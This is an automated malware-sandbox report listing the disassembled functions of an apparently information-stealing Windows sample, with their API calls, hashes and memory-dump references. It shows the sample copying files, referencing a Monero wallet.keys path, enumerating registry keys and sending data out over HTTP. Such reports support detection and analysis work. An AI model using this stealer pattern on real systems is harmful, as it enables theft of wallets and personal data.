Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 1224485577-2774362122
Opcode ID: 910d7336b9939327d6a523b6094402a9efd5fc89aff919f95b695842f9f6e82f
Instruction ID: f34f7fd6a3fd21f541e3888980887c382ca8b94b3c86dffa3b91196878a8fdf5
Opcode Fuzzy Hash: 910d7336b9939327d6a523b6094402a9efd5fc89aff919f95b695842f9f6e82f
Instruction Fuzzy Hash: D4320171931118AADB14EBA0DC96FEEB378BF54700F5041A9F10673092EF706A99CF96

Function 0025A790 Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 539
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0026AA70: StrCmpCA.SHLWAPI(00D49298,0025A7A7,?,0025A7A7,00D49298), ref: 0026AA8F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0025AAC8
RtlAllocateHeap.NTDLL(00000000), ref: 0025AACF
StrCmpCA.SHLWAPI(00000000,ERROR_RUN_EXTRACTOR), ref: 0025ABE2
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0025A8B0

Part of subcall function 0026A820: lstrlen.KERNEL32(00254F05,?,?,00254F05,00270DDE), ref: 0026A82B
Part of subcall function 0026A820: lstrcpy.KERNEL32(00270DDE,00000000), ref: 0026A885

Part of subcall function 0026A9B0: lstrlen.KERNEL32(?,00D49078,?,\Monero\wallet.keys,00270E17), ref: 0026A9C5
Part of subcall function 0026A9B0: lstrcpy.KERNEL32(00000000), ref: 0026AA04
Part of subcall function 0026A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0026AA12

Part of subcall function 0026A8A0: lstrcpy.KERNEL32(?,00270E17), ref: 0026A905

lstrcat.KERNEL32(?,00000000), ref: 0025ACEB
lstrcat.KERNEL32(?,00271320), ref: 0025ACFA
lstrcat.KERNEL32(?,00000000), ref: 0025AD0D
lstrcat.KERNEL32(?,00271324), ref: 0025AD1C
lstrcat.KERNEL32(?,00000000), ref: 0025AD2F
lstrcat.KERNEL32(?,00271328), ref: 0025AD3E
lstrcat.KERNEL32(?,00000000), ref: 0025AD51
lstrcat.KERNEL32(?,0027132C), ref: 0025AD60
lstrcat.KERNEL32(?,00000000), ref: 0025AD73
lstrcat.KERNEL32(?,00271330), ref: 0025AD82
lstrcat.KERNEL32(?,00000000), ref: 0025AD95
lstrcat.KERNEL32(?,00271334), ref: 0025ADA4
lstrcat.KERNEL32(?,00000000), ref: 0025ADB7
lstrlen.KERNEL32(?), ref: 0025AE0D
lstrlen.KERNEL32(?), ref: 0025AE1C

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

Part of subcall function 0026A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0026A7E6

DeleteFileA.KERNEL32(00000000), ref: 0025AE97

Strings

ERROR_RUN_EXTRACTOR, xrefs: 0025ABD4

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcess
String ID: ERROR_RUN_EXTRACTOR
API String ID: 4157063783-2709115261
Opcode ID: e6b0728f6ab5c3fe6cc116c81fd6df5a7ae0e4b5bb311f94a50cf7d6f65cba59
Instruction ID: 314211c5fd81316eeb5b2d719f011d9bb94f7e8df2b08413c2ab013b34c26a3b
Opcode Fuzzy Hash: e6b0728f6ab5c3fe6cc116c81fd6df5a7ae0e4b5bb311f94a50cf7d6f65cba59
Instruction Fuzzy Hash: DC120D719201089BDB04FFA0DD96EEE7378AF64301F504169B507B7091DE34AE69CFA6

Function 00255960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0026A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0026A7E6

Part of subcall function 002547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00254839
Part of subcall function 002547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00254849

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 002559F8
StrCmpCA.SHLWAPI(?,00D4EAC8), ref: 00255A13
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00255B93
lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00D4E9A8,00000000,?,00D4A3C0,00000000,?,00271A1C), ref: 00255E71
lstrlen.KERNEL32(00000000), ref: 00255E82
GetProcessHeap.KERNEL32(00000000,?), ref: 00255E93
RtlAllocateHeap.NTDLL(00000000), ref: 00255E9A
lstrlen.KERNEL32(00000000), ref: 00255EAF
lstrlen.KERNEL32(00000000), ref: 00255ED8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00255EF1
lstrlen.KERNEL32(00000000,?,?), ref: 00255F1B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00255F2F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00255F4C
InternetCloseHandle.WININET(00000000), ref: 00255FB0
InternetCloseHandle.WININET(00000000), ref: 00255FBD
HttpOpenRequestA.WININET(00000000,00D4EAD8,?,00D4DEA0,00000000,00000000,00400100,00000000), ref: 00255BF8

Part of subcall function 0026A9B0: lstrlen.KERNEL32(?,00D49078,?,\Monero\wallet.keys,00270E17), ref: 0026A9C5
Part of subcall function 0026A9B0: lstrcpy.KERNEL32(00000000), ref: 0026AA04
Part of subcall function 0026A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0026AA12

Part of subcall function 0026A8A0: lstrcpy.KERNEL32(?,00270E17), ref: 0026A905

Part of subcall function 0026A920: lstrcpy.KERNEL32(00000000,?), ref: 0026A972
Part of subcall function 0026A920: lstrcat.KERNEL32(00000000), ref: 0026A982

InternetCloseHandle.WININET(00000000), ref: 00255FC7

Strings

------, xrefs: 00255A96
------, xrefs: 00255D4C
", xrefs: 00255CD5
------, xrefs: 00255C0B
", xrefs: 00255E16

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
String ID: "$"$------$------$------
API String ID: 874700897-2180234286
Opcode ID: 33e48e4c2eca39d7107fd1ec912b04416ffeda8f45f7fb6f00a167f8cc2d3d8c
Instruction ID: 5b04ff7e9bf6c8614325d0c358608ef67ac90e599314f5f7de57bfad9e43a959
Opcode Fuzzy Hash: 33e48e4c2eca39d7107fd1ec912b04416ffeda8f45f7fb6f00a167f8cc2d3d8c
Instruction Fuzzy Hash: F712CF71931118AADB15EBA0DC96FEEB378BF14700F5041A9B10A73091EF706EA9CF65

Function 0025CEF0 Relevance: 30.4, APIs: 20, Instructions: 375
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

Part of subcall function 0026A9B0: lstrlen.KERNEL32(?,00D49078,?,\Monero\wallet.keys,00270E17), ref: 0026A9C5
Part of subcall function 0026A9B0: lstrcpy.KERNEL32(00000000), ref: 0026AA04
Part of subcall function 0026A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0026AA12

Part of subcall function 0026A8A0: lstrcpy.KERNEL32(?,00270E17), ref: 0026A905

Part of subcall function 00268B60: GetSystemTime.KERNEL32(00270E1A,00D4A4E0,002705AE,?,?,002513F9,?,0000001A,00270E1A,00000000,?,00D49078,?,\Monero\wallet.keys,00270E17), ref: 00268B86

Part of subcall function 0026A920: lstrcpy.KERNEL32(00000000,?), ref: 0026A972
Part of subcall function 0026A920: lstrcat.KERNEL32(00000000), ref: 0026A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0025CF83
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0025D0C7
RtlAllocateHeap.NTDLL(00000000), ref: 0025D0CE
lstrcat.KERNEL32(?,00000000), ref: 0025D208
lstrcat.KERNEL32(?,00271478), ref: 0025D217
lstrcat.KERNEL32(?,00000000), ref: 0025D22A
lstrcat.KERNEL32(?,0027147C), ref: 0025D239
lstrcat.KERNEL32(?,00000000), ref: 0025D24C
lstrcat.KERNEL32(?,00271480), ref: 0025D25B
lstrcat.KERNEL32(?,00000000), ref: 0025D26E
lstrcat.KERNEL32(?,00271484), ref: 0025D27D
lstrcat.KERNEL32(?,00000000), ref: 0025D290
lstrcat.KERNEL32(?,00271488), ref: 0025D29F
lstrcat.KERNEL32(?,00000000), ref: 0025D2B2
lstrcat.KERNEL32(?,0027148C), ref: 0025D2C1
lstrcat.KERNEL32(?,00000000), ref: 0025D2D4
lstrcat.KERNEL32(?,00271490), ref: 0025D2E3

Part of subcall function 0026A820: lstrlen.KERNEL32(00254F05,?,?,00254F05,00270DDE), ref: 0026A82B
Part of subcall function 0026A820: lstrcpy.KERNEL32(00270DDE,00000000), ref: 0026A885

lstrlen.KERNEL32(?), ref: 0025D32A
lstrlen.KERNEL32(?), ref: 0025D339

Part of subcall function 0026AA70: StrCmpCA.SHLWAPI(00D49298,0025A7A7,?,0025A7A7,00D49298), ref: 0026AA8F

DeleteFileA.KERNEL32(00000000), ref: 0025D3B4

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: 569946a7f42945439ce492bb807d76b7325367b0cbb8374f7b4d5b8bd7914ba8
Instruction ID: d2e043849d534c7760276206087e111abcb22b8ec40c4e3eed51943e1693f09f
Opcode Fuzzy Hash: 569946a7f42945439ce492bb807d76b7325367b0cbb8374f7b4d5b8bd7914ba8
Instruction Fuzzy Hash: 39E1FB71920108ABCB04FBA4DD96EEE7378AF64301F104169F507B7091DE35AE69CFA6

Function 00254880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0026A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0026A7E6

Part of subcall function 002547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00254839
Part of subcall function 002547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00254849

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00254915
StrCmpCA.SHLWAPI(?,00D4EAC8), ref: 0025493A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00254ABA
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00270DDB,00000000,?,?,00000000,?,",00000000,?,00D4EB08), ref: 00254DE8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00254E04
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00254E18
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00254E49
InternetCloseHandle.WININET(00000000), ref: 00254EAD
InternetCloseHandle.WININET(00000000), ref: 00254EC5
HttpOpenRequestA.WININET(00000000,00D4EAD8,?,00D4DEA0,00000000,00000000,00400100,00000000), ref: 00254B15

Part of subcall function 0026A9B0: lstrlen.KERNEL32(?,00D49078,?,\Monero\wallet.keys,00270E17), ref: 0026A9C5
Part of subcall function 0026A9B0: lstrcpy.KERNEL32(00000000), ref: 0026AA04
Part of subcall function 0026A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0026AA12

Part of subcall function 0026A8A0: lstrcpy.KERNEL32(?,00270E17), ref: 0026A905

Part of subcall function 0026A920: lstrcpy.KERNEL32(00000000,?), ref: 0026A972
Part of subcall function 0026A920: lstrcat.KERNEL32(00000000), ref: 0026A982

InternetCloseHandle.WININET(00000000), ref: 00254ECF

Strings

", xrefs: 00254D33
------, xrefs: 002549BD
------, xrefs: 00254B28
------, xrefs: 00254C69
", xrefs: 00254BF2

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 460715078-2180234286
Opcode ID: d06aa6fe2643099b3afec13bbae9fc6079af623c34d2f1539311cd46e183d247
Instruction ID: e26c7146fad931d547cdd727dd0e2732c0ed47df69872228611bb4fc3672fb94
Opcode Fuzzy Hash: d06aa6fe2643099b3afec13bbae9fc6079af623c34d2f1539311cd46e183d247
Instruction Fuzzy Hash: 5D12DE71921118AADB15EB90DD92FEEB378BF15300F5041A9B10673091EF706FA9CF66

Function 00268320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

RegOpenKeyExA.KERNEL32(00000000,00D4B748,00000000,00020019,00000000,002705B6), ref: 002683A4
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00268426
wsprintfA.USER32 ref: 00268459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0026847B
RegCloseKey.ADVAPI32(00000000), ref: 0026848C
RegCloseKey.ADVAPI32(00000000), ref: 00268499

Part of subcall function 0026A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0026A7E6

Strings

- , xrefs: 002685A3
?, xrefs: 0026837A
%s\%s, xrefs: 0026844D

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: 459e42cd559c7cd3f620c5a73c23bad84624d0ee649766af8ffafb3d477a4ae7
Instruction ID: 1b117e2b6ae776727a151504bd07047c08c0e57f61074f1837dc7cb38a946a23
Opcode Fuzzy Hash: 459e42cd559c7cd3f620c5a73c23bad84624d0ee649766af8ffafb3d477a4ae7
Instruction Fuzzy Hash: 8D810A71921118ABDB24DF54CD95FEAB7B8BB18700F0082E9E109A6180DF716BD9CFD5

Function 00256280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0026A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0026A7E6

Part of subcall function 002547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00254839
Part of subcall function 002547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00254849

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

InternetOpenA.WININET(00270DFE,00000001,00000000,00000000,00000000), ref: 002562E1
StrCmpCA.SHLWAPI(?,00D4EAC8), ref: 00256303
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00256335
HttpOpenRequestA.WININET(00000000,GET,?,00D4DEA0,00000000,00000000,00400100,00000000), ref: 00256385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 002563BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002563D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 002563FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0025646D
InternetCloseHandle.WININET(00000000), ref: 002564EF
InternetCloseHandle.WININET(00000000), ref: 002564F9
InternetCloseHandle.WININET(00000000), ref: 00256503

Strings

